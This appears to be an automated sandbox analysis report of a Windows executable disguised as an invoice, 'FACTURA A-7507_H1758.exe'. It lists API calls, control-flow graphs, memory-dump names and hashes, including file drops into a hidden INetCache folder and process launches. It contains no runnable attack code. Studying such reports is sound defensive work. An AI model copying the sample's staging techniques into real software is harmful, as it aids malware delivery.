                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsrFDBF.tmp
                                                                                                                                                                                                                          • API String ID: 1356686001-1845510914
                                                                                                                                                                                                                          • Opcode ID: cd6d4c48b0c6b17b23d265fb4390c97c9a095f979bd604b51657a4d03f047cf7
                                                                                                                                                                                                                          • Instruction ID: d84b147cfae213de6894e87518a1957a70c03431d85ade02b305fde94438308f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd6d4c48b0c6b17b23d265fb4390c97c9a095f979bd604b51657a4d03f047cf7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E511C071E00108BFEB10AFA4DE89DAE777DEB14358F11403AF904B71D1DBB85E409668

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 980 405d82-405d8e 981 405d8f-405dc3 GetTickCount GetTempFileNameW 980->981 982 405dd2-405dd4 981->982 983 405dc5-405dc7 981->983 985 405dcc-405dcf 982->985 983->981 984 405dc9 983->984 984->985
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00405DA0
                                                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",004033B4,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405DBB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405D87
                                                                                                                                                                                                                          • "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe", xrefs: 00405D82
                                                                                                                                                                                                                          • nsa, xrefs: 00405D8F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                          • API String ID: 1716503409-4199357824
                                                                                                                                                                                                                          • Opcode ID: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                                                                                                                                                                                          • Instruction ID: a69a53d4b23f3d63feeda802a3e8a765614c71270742c911b33c62312df6cecc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32F06D76600608BBDB008B59DD09AABBBB8EF91710F10803BEE01F7190E6B09A548B64

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 986 10001759-10001795 call 10001b18 990 100018a6-100018a8 986->990 991 1000179b-1000179f 986->991 992 100017a1-100017a7 call 10002286 991->992 993 100017a8-100017b5 call 100022d0 991->993 992->993 998 100017e5-100017ec 993->998 999 100017b7-100017bc 993->999 1000 1000180c-10001810 998->1000 1001 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 998->1001 1002 100017d7-100017da 999->1002 1003 100017be-100017bf 999->1003 1006 10001812-1000184c call 100015b4 call 100024a9 1000->1006 1007 1000184e-10001854 call 100024a9 1000->1007 1027 10001855-10001859 1001->1027 1002->998 1008 100017dc-100017dd call 10002b5f 1002->1008 1004 100017c1-100017c2 1003->1004 1005 100017c7-100017c8 call 100028a4 1003->1005 1011 100017c4-100017c5 1004->1011 1012 100017cf-100017d5 call 10002645 1004->1012 1018 100017cd 1005->1018 1006->1027 1007->1027 1021 100017e2 1008->1021 1011->998 1011->1005 1026 100017e4 1012->1026 1018->1021 1021->1026 1026->998 1030 10001896-1000189d 1027->1030 1031 1000185b-10001869 call 1000246c 1027->1031 1030->990 1034 1000189f-100018a0 GlobalFree 1030->1034 1036 10001881-10001888 1031->1036 1037 1000186b-1000186e 1031->1037 1034->990 1036->1030 1039 1000188a-10001895 call 1000153d 1036->1039 1037->1036 1038 10001870-10001878 1037->1038 1038->1036 1040 1000187a-1000187b FreeLibrary 1038->1040 1039->1030 1040->1036
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                                                                                                                            • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                                                                                                                                                            • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                                                                                                                                            • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26345910476.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345861444.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345958604.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26346002793.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1791698881-3916222277
                                                                                                                                                                                                                          • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                                                                                                                          • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1043 401e66-401e77 call 402bbf call 4052dd call 40585e 1049 401e7c-401e81 1043->1049 1050 401e87-401e8a 1049->1050 1051 40281e-402825 1049->1051 1053 401edb-401ee4 CloseHandle 1050->1053 1054 401e8c-401e9c WaitForSingleObject 1050->1054 1052 402a4c-402a5b 1051->1052 1053->1052 1056 401eac-401eae 1054->1056 1058 401eb0-401ec0 GetExitCodeProcess 1056->1058 1059 401e9e-401eaa call 406594 WaitForSingleObject 1056->1059 1061 401ec2-401ecd call 4060c5 1058->1061 1062 401ecf-401ed2 1058->1062 1059->1056 1061->1053 1062->1053 1063 401ed4 1062->1063 1063->1053
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                                                                                                                                                                                            • Part of subcall function 004052DD: lstrcatW.KERNEL32(00422708,00402E19,00402E19,00422708,00000000,00000000,00000000), ref: 00405338
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SetWindowTextW.USER32(00422708,00422708), ref: 0040534A
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                                                                                                                                                                                            • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                                                                                                                                                                                            • Part of subcall function 0040585E: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 00405887
                                                                                                                                                                                                                            • Part of subcall function 0040585E: CloseHandle.KERNEL32(?), ref: 00405894
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3585118688-0
                                                                                                                                                                                                                          • Opcode ID: ea69566b590d7baadefbea0acf4950f243a978aaa9f1905751507829e3954413
                                                                                                                                                                                                                          • Instruction ID: 5702df78c33f9bd13decba52644e1012fe72a42f767711efff684f6f7274af03
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea69566b590d7baadefbea0acf4950f243a978aaa9f1905751507829e3954413
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF11A131900508EBCF21AF91CD4499E7AB6AF40314F21407BFA05B61F1D7798A92DB99
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405BDD: CharNextW.USER32(?,?,00425F30,?,00405C51,00425F30,00425F30, 4#w.#w,?,77232EE0,0040598F,?,77233420,77232EE0,00000000), ref: 00405BEB
                                                                                                                                                                                                                            • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405BF0
                                                                                                                                                                                                                            • Part of subcall function 00405BDD: CharNextW.USER32(00000000), ref: 00405C08
                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                                                                                                                                            • Part of subcall function 004057AC: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004057EF
                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration\Varmluftsovn,?,00000000,000000F0), ref: 00401645
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration\Varmluftsovn, xrefs: 00401638
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration\Varmluftsovn
                                                                                                                                                                                                                          • API String ID: 1892508949-1441128270
                                                                                                                                                                                                                          • Opcode ID: 73517b5d0da78be28060eaa35170b82405513a3442ab2227d9f24ad0b2409d52
                                                                                                                                                                                                                          • Instruction ID: 18abe7de9e9977a76830232601504265d2e6edcedfe07fce7f69d5744a4425eb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73517b5d0da78be28060eaa35170b82405513a3442ab2227d9f24ad0b2409d52
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F911E631500504EBCF207FA0CD0199E3AB2EF44364B25453BF906B61F2DA3D4A819E5E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00405280
                                                                                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004052D1
                                                                                                                                                                                                                            • Part of subcall function 0040428E: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                          • Opcode ID: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                                                                                                                                                                                          • Instruction ID: 35360b72f4910b777185a6264b25dc7760dbd7dc789205491e41d57b326ac1ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B019E71210708ABDF208F11DD84E9B3A35EF94321F60443AFA00761D1C77A8D529E6A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 00405887
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00405894
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Error launching installer, xrefs: 00405871
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                          • String ID: Error launching installer
                                                                                                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                                                                                                          • Opcode ID: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                                                                                                                                                                                          • Instruction ID: 0fb7bd0647ee639374dbc29985885c8cd5f4694ddcbbc5ba66c50ad851a9a680
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03ab27a360793ac613c0483ba4ee8f6366951212bcf32abb356d437eb8ce57e6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22E04FB0A002097FEB009B64ED45F7B77ACEB04208F408431BD00F2150D77498248A78
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6748365695d0b60958ae2de605dce3010a9a46cb287cd8314348fa6e45a6e7ef
                                                                                                                                                                                                                          • Instruction ID: 95c87b37ce546c92696c349aad8761a6baa0f42cb897a758cf539d426e2a5a70
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6748365695d0b60958ae2de605dce3010a9a46cb287cd8314348fa6e45a6e7ef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65A13471D00229CBDF28CFA8C844AADBBB1FF44305F15816AD956BB281D7785A86DF44
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: e6b96a49f958b7a8d2aa4cc917083ea926a28b83a61870a924df7985f049b653
                                                                                                                                                                                                                          • Instruction ID: dd225a6952a4a1885b566de7f95e3528e0c965b1b64db9b9769652e5c735704b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6b96a49f958b7a8d2aa4cc917083ea926a28b83a61870a924df7985f049b653
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D913370D04229CBDF28CFA8C844BADBBB1FF44305F15816AD856BB291C7789A86DF45
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
